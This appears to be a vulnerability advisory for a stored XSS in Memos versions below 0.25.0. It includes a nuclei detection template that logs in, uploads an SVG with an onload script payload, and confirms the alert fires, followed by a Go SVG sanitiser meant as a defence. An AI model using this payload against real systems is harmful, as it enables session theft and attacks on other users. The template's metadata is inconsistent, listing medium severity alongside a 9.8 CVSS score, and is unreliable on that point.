Vulnerability Information
Vulnerability name: Memos Stored XSS via SVG File Upload Vulnerability
Vulnerability ID:
Vulnerability type: Cross-site scripting (XSS)
Severity: Medium
Description: Memos is an open-source note-taking and knowledge management tool, widely used by individuals and small teams for knowledge management and information sharing. It supports multi-user collaboration and is usually deployed on private servers or cloud platforms, making it easy for team members to exchange information and share documents. The tool is popular with users for its clean interface and efficient feature set. The vulnerability described here lies in Memos' SVG file upload feature: an attacker can upload an SVG file containing malicious JavaScript and thereby trigger a stored cross-site scripting (XSS) attack. The root cause is that the application does not adequately validate and filter the contents of uploaded SVG files, so the embedded script executes when another user views the file. Because an XSS vulnerability executes arbitrary JavaScript without the user's knowledge, an attacker can use it to steal users' session tokens, redirect users to malicious sites, or perform other malicious actions in the user's browser. Note that exploiting this vulnerability requires valid user credentials, so it is a post-authentication attack. Even so, once an attacker has an account they can easily use it to attack other users, which raises the security risk inside an organization.
Vendor: usememos
Product: Memos
Affected versions: < 0.25.0
Source: https://github.com/projectdiscovery/nuclei-templates/blob/c58f2a2ddff52ea95ffc5a820dd115bbc5842c31/headless%2Fcves%2F2025%2FCVE-2025-50738.yaml
Type: projectdiscovery/nuclei-templates:github issues
PoC details
id: CVE-2025-50738

info:
  name: Memos < 0.25.0 - Stored XSS via SVG File Upload (Fixed Matcher)
  author: SeongHyeonJeon[nukunga]
  severity: medium
  description: |
    An authenticated attacker can upload a specially crafted SVG file containing JavaScript code to Memos versions prior to 0.25.0, leading to a stored cross-site scripting (XSS) vulnerability.
  reference:
    - https://github.com/usememos/memos/issues/4707
    - https://github.com/advisories/GHSA-hfcf-79gh-f3jc
    - https://nvd.nist.gov/vuln/detail/CVE-2025-50738
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 9.8
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
  tags: xss,stored-xss,memos,authenticated,ghsa,intrusive,headless

variables:
  username: "{{username}}"
  password: "{{password}}"
  filename: "{{rand_base(8)}}"

http:
  - raw:
      - |
        POST /api/v1/auth/signin?username={{username}}&password={{password}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    extractors:
      - type: regex
        part: header
        name: access_token
        internal: true
        group: 1
        regex:
          - 'memos\.access-token=([^;]+);'

  - method: POST
    path:
      - "{{BaseURL}}/api/v1/resources"
    headers:
      Cookie: "memos.access-token={{access_token}}"
      Content-Type: "application/json"
    body: |
      {
        "filename": "{(unknown)}.svg",
        "content": "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPjwvc3ZnPg==",
        "type": "image/svg+xml"
      }

    extractors:
      - type: regex
        name: resource_id
        internal: true
        part: body
        group: 1
        regex:
          - '"name":"resources/([A-Za-z0-9]+)"'

headless:
  - steps:
      - action: navigate
        args:
          url: "{{BaseURL}}/file/resources/{{resource_id}}/{(unknown)}.svg"

      - action: waitdialog
        name: xss_alert

    matchers:
      - type: dsl
        dsl:
          - xss_alert == true
          - xss_alert_message == "1"
          - xss_alert_type == "alert"
        condition: and
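The root cause named in the description is the missing content check on uploaded SVG files. As an added defensive example (not part of the nuclei template or of Memos' own code; the function and constant names are hypothetical), the Go function below walks an SVG's XML token stream at upload time and rejects the constructs that make inline rendering executable: script and foreignObject elements, on* event-handler attributes (the template's payload uses onload), and javascript: URLs in href attributes. It is exercised against the base64 payload from the template above.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"encoding/xml"
	"io"
	"strings"
)

// Payload copied from the nuclei template above; once decoded it is <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"></svg>.
const PoCSVGBase64 = "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIG9ubG9hZD0iYWxlcnQoMSkiPjwvc3ZnPg=="

// DecodePoC returns the template's SVG bytes (hypothetical helper for the demo).
func DecodePoC() []byte {
	b, _ := base64.StdEncoding.DecodeString(PoCSVGBase64)
	return b
}

// CheckSVG returns a reason for the first construct that could run script when
// the file is rendered inline, or "" if the whole document is clean (hypothetical check).
func CheckSVG(data []byte) string {
	d := xml.NewDecoder(bytes.NewReader(data))
	for {
		tok, err := d.Token()
		if err == io.EOF {
			return "" // whole document scanned, nothing flagged
		}
		if err != nil {
			return "malformed XML: " + err.Error()
		}
		switch t := tok.(type) {
		case xml.StartElement:
			name := strings.ToLower(t.Name.Local)
			if name == "script" || name == "foreignobject" {
				return "forbidden element <" + name + ">"
			}
			for _, a := range t.Attr { // onload, onclick, ... and javascript: links
				an := strings.ToLower(a.Name.Local)
				av := strings.ToLower(strings.TrimSpace(a.Value))
				if strings.HasPrefix(an, "on") {
					return "event handler attribute " + an
				}
				if an == "href" && strings.HasPrefix(av, "javascript:") {
					return "javascript: URL in href"
				}
			}
		}
	}
}
```

Rejecting the file is only one half of the fix; serving stored SVGs with Content-Disposition: attachment or under a sandboxing Content-Security-Policy keeps any payload that slips through from executing in the application's origin.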